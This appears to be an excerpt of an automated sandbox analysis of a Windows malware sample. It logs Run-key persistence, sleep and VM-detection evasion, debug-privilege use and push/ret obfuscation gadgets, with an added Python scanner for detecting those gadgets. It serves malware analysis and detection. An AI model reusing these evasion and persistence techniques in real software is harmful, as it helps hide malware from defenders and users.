          Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: SC_0017384.exe, 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.381474937.000000000140D000.00000004.00000020.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.383573088.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000051DF000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000050C0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.433202218.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000003.430554668.0000000004D83000.00000004.00000020.00020000.00000000.sdmp, Lvdnyvcvr.exe, 0000000E.00000002.548095343.0000000001520000.00000040.00001000.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000010.00000002.567296609.00000000013B0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: SC_0017384.exe, SC_0017384.exe, 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.381474937.000000000140D000.00000004.00000020.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.383573088.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000051DF000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000050C0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.433202218.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000003.430554668.0000000004D83000.00000004.00000020.00020000.00000000.sdmp, Lvdnyvcvr.exe, 0000000E.00000002.548095343.0000000001520000.00000040.00001000.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000010.00000002.567296609.00000000013B0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0041AB65 pushad ; retf
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0040DCD0 push ebp; retf
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0041A5D7 push es; iretd
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_00422DFB push dword ptr [DF27AEF3h]; ret
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_00401D80 push eax; ret
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_00406D88 pushfd ; ret
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_004055AA push esp; ret
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0041B612 push edi; ret
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_004116DF pushfd ; retf
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017BD0D1 push ecx; ret
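Each `push X; ret` above (and the `retf` and `iretd` variants) is an indirect jump spelled so that a linear disassembler or a signature engine never sees a `jmp`: the pushed value becomes the return address. Several of these hits sit in the unpacked 0x0040xxxx region, i.e. in the injected payload rather than in the .NET loader. As an added example, not from the report, here is a Python byte scanner that finds a push-family instruction immediately followed by a ret-family instruction in a 32-bit code buffer, reporting them in the same mnemonic style the sandbox uses. The sample bytes are constructed for the example, not taken from the binary.

```python
from typing import List, Optional, Tuple

# Constructed sample: an ordinary prologue followed by the push/ret forms the
# sandbox lists for this sample. Not bytes from the binary; built so the
# scanner can run offline.
SAMPLE_CODE = bytes.fromhex(
    "558bec"          # push ebp; mov ebp, esp   (normal prologue, must not be flagged)
    "6878563412c3"    # push 12345678h; ret      (an obfuscated jmp 12345678h)
    "50c3"            # push eax; ret            (an obfuscated jmp eax)
    "60cb"            # pushad; retf
    "9cc3"            # pushfd; ret
    "ff35f3ae27dfc3"  # push dword ptr [DF27AEF3h]; ret
    "06cf"            # push es; iretd
)

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
RET_OPCODES = {0xC3: "ret", 0xC2: "ret imm16", 0xCB: "retf", 0xCA: "retf imm16", 0xCF: "iretd"}
SEGMENT_PUSH = {0x06: "push es", 0x0E: "push cs", 0x16: "push ss", 0x1E: "push ds"}


def decode_push(code: bytes, i: int) -> Optional[Tuple[str, int]]:
    """If code[i] starts a push instruction, return (mnemonic, encoded length); else None."""
    op = code[i]
    if 0x50 <= op <= 0x57:                       # push r32
        return f"push {REG32[op - 0x50]}", 1
    if op == 0x60:
        return "pushad", 1
    if op == 0x9C:
        return "pushfd", 1
    if op in SEGMENT_PUSH:
        return SEGMENT_PUSH[op], 1
    if op == 0x68 and i + 5 <= len(code):        # push imm32
        imm = int.from_bytes(code[i + 1:i + 5], "little")
        return f"push {imm:08X}h", 5
    if op == 0x6A and i + 2 <= len(code):        # push imm8
        return f"push {code[i + 1]:02X}h", 2
    if op == 0xFF and i + 6 <= len(code) and code[i + 1] == 0x35:   # push dword ptr [disp32]
        addr = int.from_bytes(code[i + 2:i + 6], "little")
        return f"push dword ptr [{addr:08X}h]", 6
    return None


def find_push_ret_gadgets(code: bytes) -> List[Tuple[int, str, str]]:
    """Linear byte scan: (offset, push mnemonic, ret mnemonic) for every push directly followed by a ret."""
    hits = []
    for i in range(len(code)):
        push = decode_push(code, i)
        if push is None:
            continue
        mnemonic, length = push
        j = i + length
        if j < len(code) and code[j] in RET_OPCODES:
            hits.append((i, mnemonic, RET_OPCODES[code[j]]))
    return hits


if __name__ == "__main__":
    for offset, push, ret in find_push_ret_gadgets(SAMPLE_CODE):
        print(f"{offset:08X} {push}; {ret}")
```

The scan is byte-linear with no disassembly, so a hit inside data or in a misaligned instruction stream is possible; treat hits as candidates and confirm by disassembling from a known function entry. A prologue's `push ebp` is never flagged on its own, only a push whose very next byte is a return, which is why the count of such pairs per function is a usable obfuscation score where a single hit is not.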
Source: C:\Users\user\Desktop\SC_0017384.exe | File created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
Source: C:\Users\user\Desktop\SC_0017384.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Lvdnyvcvr
Source: C:\Users\user\Desktop\SC_0017384.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Lvdnyvcvr
Source: C:\Users\user\Desktop\SC_0017384.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996 | Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996 | Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5980 | Thread sleep count: 2343 > 30
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996 | Thread sleep time: -99812s >= -30000s
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996 | Thread sleep time: -99700s >= -30000s
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996 | Thread sleep time: -99593s >= -30000s
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996 | Thread sleep time: -99484s >= -30000s
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996 | Thread sleep time: -99372s >= -30000s
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996 | Thread sleep time: -99265s >= -30000s
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996 | Thread sleep time: -99151s >= -30000s
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996 | Thread sleep time: -99042s >= -30000s
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996 | Thread sleep time: -98916s >= -30000s
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5884 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1380 | Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 | Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 | Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 3856 | Thread sleep count: 2522 > 30
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 | Thread sleep time: -99848s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 | Thread sleep time: -99714s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 | Thread sleep time: -99609s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 | Thread sleep time: -99499s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 | Thread sleep time: -99385s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 | Thread sleep time: -99274s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 | Thread sleep time: -99172s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 | Thread sleep time: -99057s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 | Thread sleep time: -98953s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 | Thread sleep time: -98844s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 2248 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\systray.exe TID: 5724 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732 | Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5740 | Thread sleep count: 2179 > 30
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732 | Thread sleep time: -99844s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732 | Thread sleep time: -99661s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732 | Thread sleep time: -99545s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732 | Thread sleep time: -99436s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732 | Thread sleep time: -99297s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732 | Thread sleep time: -99184s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732 | Thread sleep time: -99075s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732 | Thread sleep time: -98968s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5716 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4088 | Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1004 | Thread sleep count: 9436 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1792 | Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\SysWOW64\systray.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (2 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01835BA5 rdtsc
Source: C:\Users\user\Desktop\SC_0017384.exe | Thread delayed: delay time: 922337203685477 (2 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Thread delayed: delay time: 922337203685477 (4 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (2 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Window / User API: threadDelayed 2343
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9412
Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 736
Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 703
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Window / User API: threadDelayed 2522
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Window / User API: threadDelayed 2179
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9589
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9436
Source: C:\Users\user\Desktop\SC_0017384.exe | API coverage: 9.4 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\SC_0017384.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\SC_0017384.exe | Thread delayed: delay time: 100000
Source: C:\Users\user\Desktop\SC_0017384.exe | Thread delayed: delay time: 99812
Source: C:\Users\user\Desktop\SC_0017384.exe | Thread delayed: delay time: 99700
Source: C:\Users\user\Desktop\SC_0017384.exe | Thread delayed: delay time: 99593
Source: C:\Users\user\Desktop\SC_0017384.exe | Thread delayed: delay time: 99484
Source: C:\Users\user\Desktop\SC_0017384.exe | Thread delayed: delay time: 99372
Source: C:\Users\user\Desktop\SC_0017384.exe | Thread delayed: delay time: 99265
Source: C:\Users\user\Desktop\SC_0017384.exe | Thread delayed: delay time: 99151
Source: C:\Users\user\Desktop\SC_0017384.exe | Thread delayed: delay time: 99042
Source: C:\Users\user\Desktop\SC_0017384.exe | Thread delayed: delay time: 98916
Source: C:\Users\user\Desktop\SC_0017384.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Thread delayed: delay time: 99848
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Thread delayed: delay time: 99714
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Thread delayed: delay time: 99609
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Thread delayed: delay time: 99499
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Thread delayed: delay time: 99385
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Thread delayed: delay time: 99274
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Thread delayed: delay time: 99172
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Thread delayed: delay time: 99057
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Thread delayed: delay time: 98953
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Thread delayed: delay time: 98844
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Thread delayed: delay time: 922337203685477 (2 identical entries)
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Thread delayed: delay time: 99844
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Thread delayed: delay time: 99661
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Thread delayed: delay time: 99545
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Thread delayed: delay time: 99436
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Thread delayed: delay time: 99297
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Thread delayed: delay time: 99184
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Thread delayed: delay time: 99075
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Thread delayed: delay time: 98968
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (2 identical entries)
Source: explorer.exe, 00000004.00000003.535831998.0000000008645000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: SC_0017384.exe, 00000000.00000002.381865907.0000000001412000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
Source: explorer.exe, 00000004.00000000.386129776.000000000091F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000003.552222750.00000000086E7000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
Source: Lvdnyvcvr.exe, 00000005.00000002.567915888.0000000005DED000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 00000004.00000003.552222750.00000000086E7000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000002.582466322.0000000004437000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000003.552222750.00000000086E7000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: Lvdnyvcvr.exe, 00000009.00000002.574184145.0000000005E40000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: SC_0017384.exe, 00000000.00000002.400969818.00000000068AE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000003.535831998.0000000008645000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000004.00000003.533892507.000000000EFC5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.551309826.000000000EFCB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.539351486.000000000EFC7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.551825356.000000000EFCB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.593029452.000000000EFCB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01835BA5 rdtsc
Source: C:\Users\user\Desktop\SC_0017384.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\SC_0017384.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0176B171 mov eax, dword ptr fs:[00000030h] (2 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0176C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0178B944 mov eax, dword ptr fs:[00000030h] (2 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0179513A mov eax, dword ptr fs:[00000030h] (2 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01784120 mov eax, dword ptr fs:[00000030h] (4 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01784120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01769100 mov eax, dword ptr fs:[00000030h] (3 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0176B1E1 mov eax, dword ptr fs:[00000030h] (3 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017F41E8 mov eax, dword ptr fs:[00000030h]
